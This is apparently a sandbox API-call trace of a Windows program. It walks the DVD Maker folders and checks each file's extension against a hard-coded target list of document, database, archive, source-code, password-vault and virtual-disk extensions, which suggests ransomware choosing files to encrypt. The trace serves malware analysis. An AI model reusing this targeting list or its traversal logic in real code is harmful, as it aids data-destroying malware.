0x0 [0040.149] PathCombineW (in: pszDest=0x2e4d1c0, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles", pszFile="*" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*" [0040.149] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*", lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0x54ad60 [0040.151] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.152] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.152] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles", pszFile="16to9Squareframe_Buttongraphic.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" [0040.152] PathFindExtensionW (pszPath="16to9Squareframe_Buttongraphic.png") returned=".png" [0040.152] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.152] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.152] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.152] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles", pszFile="16to9Squareframe_SelectionSubpicture.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" [0040.152] PathFindExtensionW (pszPath="16to9Squareframe_SelectionSubpicture.png") returned=".png" [0040.152] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.152] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.152] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.153] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles", pszFile="16to9Squareframe_VideoInset.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png" [0040.153] PathFindExtensionW (pszPath="16to9Squareframe_VideoInset.png") returned=".png" [0040.153] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.153] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.153] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.153] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles", pszFile="4to3Squareframe_Buttongraphic.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" [0040.153] PathFindExtensionW (pszPath="4to3Squareframe_Buttongraphic.png") returned=".png" [0040.153] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.153] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.153] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.153] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles", pszFile="4to3Squareframe_SelectionSubpicture.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png" [0040.153] PathFindExtensionW (pszPath="4to3Squareframe_SelectionSubpicture.png") returned=".png" [0040.153] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.153] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.153] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.153] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles", pszFile="4to3Squareframe_VideoInset.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png" [0040.153] PathFindExtensionW (pszPath="4to3Squareframe_VideoInset.png") returned=".png" [0040.153] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.153] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.154] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.154] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles", pszFile="BabyBoy" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" [0040.154] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 0x0 [0040.154] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="*" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\*") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\*" [0040.154] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.156] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.156] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.156] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="babyblue.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png" [0040.156] PathFindExtensionW (pszPath="babyblue.png") returned=".png" [0040.156] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.156] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.156] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.156] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="BabyBoyMainBackground.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv" [0040.156] PathFindExtensionW (pszPath="BabyBoyMainBackground.wmv") returned=".wmv" [0040.157] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.157] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.157] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.157] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="BabyBoyMainBackground_PAL.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv" [0040.157] PathFindExtensionW (pszPath="BabyBoyMainBackground_PAL.wmv") returned=".wmv" [0040.157] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.157] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.157] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.157] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="BabyBoyMainToNotesBackground.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv" [0040.157] PathFindExtensionW (pszPath="BabyBoyMainToNotesBackground.wmv") returned=".wmv" [0040.157] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.157] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.158] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.158] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="BabyBoyMainToNotesBackground_PAL.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv" [0040.158] PathFindExtensionW (pszPath="BabyBoyMainToNotesBackground_PAL.wmv") returned=".wmv" [0040.158] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.158] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.158] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.158] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="BabyBoyMainToScenesBackground.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv" [0040.158] PathFindExtensionW (pszPath="BabyBoyMainToScenesBackground.wmv") returned=".wmv" [0040.158] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.158] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.158] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.158] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="BabyBoyMainToScenesBackground_PAL.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv" [0040.159] PathFindExtensionW (pszPath="BabyBoyMainToScenesBackground_PAL.wmv") returned=".wmv" [0040.159] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.159] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.159] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.159] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="BabyBoyNotesBackground.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv" [0040.159] PathFindExtensionW (pszPath="BabyBoyNotesBackground.wmv") returned=".wmv" [0040.159] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.159] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.159] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.159] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="BabyBoyNotesBackground_PAL.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv" [0040.159] PathFindExtensionW (pszPath="BabyBoyNotesBackground_PAL.wmv") returned=".wmv" [0040.159] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.159] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.159] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.159] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="BabyBoyScenesBackground.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv" [0040.159] PathFindExtensionW (pszPath="BabyBoyScenesBackground.wmv") returned=".wmv" [0040.159] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.160] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.160] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.160] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="BabyBoyScenesBackground_PAL.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv" [0040.160] PathFindExtensionW (pszPath="BabyBoyScenesBackground_PAL.wmv") returned=".wmv" [0040.160] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.160] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.160] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.160] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="LightBlueRectangle.PNG" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG" [0040.160] PathFindExtensionW (pszPath="LightBlueRectangle.PNG") returned=".PNG" [0040.160] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".PNG.") returned 5 [0040.160] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".PNG.") returned 0x0 [0040.160] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.160] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="MainMenuButtonIcon.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png" [0040.160] PathFindExtensionW (pszPath="MainMenuButtonIcon.png") returned=".png" [0040.160] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.160] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.160] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.160] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="navSubpicture.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png" [0040.160] PathFindExtensionW (pszPath="navSubpicture.png") returned=".png" [0040.161] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.161] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.161] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.161] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="nav_leftarrow.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png" [0040.161] PathFindExtensionW (pszPath="nav_leftarrow.png") returned=".png" [0040.161] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.161] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.161] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.161] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="nav_rightarrow.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png" [0040.161] PathFindExtensionW (pszPath="nav_rightarrow.png") returned=".png" 